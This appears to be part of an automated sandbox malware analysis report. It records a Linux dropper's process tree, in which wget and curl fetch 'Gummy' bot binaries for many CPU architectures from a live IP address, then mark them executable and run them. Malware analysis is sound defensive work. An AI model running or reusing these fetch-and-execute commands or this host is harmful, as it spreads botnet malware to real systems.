| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/SSH | /tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 | N/A |
Processes
/tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118
[/tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.x86]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.x86]
/bin/cat
[cat Gummy.x86]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-skqFsz]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.mips]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.mips]
/bin/cat
[cat Gummy.mips]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-skqFsz]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.mpsl]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.mpsl]
/bin/cat
[cat Gummy.mpsl]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.arm4]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.arm4]
/bin/cat
[cat Gummy.arm4]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.arm5]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.arm5]
/bin/cat
[cat Gummy.arm5]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.arm6]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.arm6]
/bin/cat
[cat Gummy.arm6]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.arm7]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.arm7]
/bin/cat
[cat Gummy.arm7]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.ppc]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.ppc]
/bin/cat
[cat Gummy.ppc]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.m68k]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.m68k]
/bin/cat
[cat Gummy.m68k]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.sh4]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.sh4]
/bin/cat
[cat Gummy.sh4]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]
/tmp/SSH
[./SSH Gummy-SSH]
Network
| Country | Destination | Domain | Proto |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-08-23 23:19
Reported
2024-08-23 23:22
Platform
debian9-mipsel-20240611-en
Max time kernel
62s
Max time network
65s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/SSH | /tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 | N/A |
Processes
/tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118
[/tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.x86]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.x86]
/bin/cat
[cat Gummy.x86]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH systemd-private-60ecbd699a944fc09467a2f903e6ded9-systemd-timedated.service-mkf0kl]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.mips]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.mips]
/bin/cat
[cat Gummy.mips]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH systemd-private-60ecbd699a944fc09467a2f903e6ded9-systemd-timedated.service-mkf0kl]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.mpsl]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.mpsl]
/bin/cat
[cat Gummy.mpsl]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH systemd-private-60ecbd699a944fc09467a2f903e6ded9-systemd-timedated.service-mkf0kl]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.arm4]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.arm4]
/bin/cat
[cat Gummy.arm4]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH systemd-private-60ecbd699a944fc09467a2f903e6ded9-systemd-timedated.service-mkf0kl]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.arm5]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.arm5]
/bin/cat
[cat Gummy.arm5]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.arm6]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.arm6]
/bin/cat
[cat Gummy.arm6]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.arm7]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.arm7]
/bin/cat
[cat Gummy.arm7]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.ppc]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.ppc]
/bin/cat
[cat Gummy.ppc]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.m68k]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.m68k]
/bin/cat
[cat Gummy.m68k]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.sh4]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.sh4]
/bin/cat
[cat Gummy.sh4]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]
/tmp/SSH
[./SSH Gummy-SSH]
Network
| Country | Destination | Domain | Proto |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |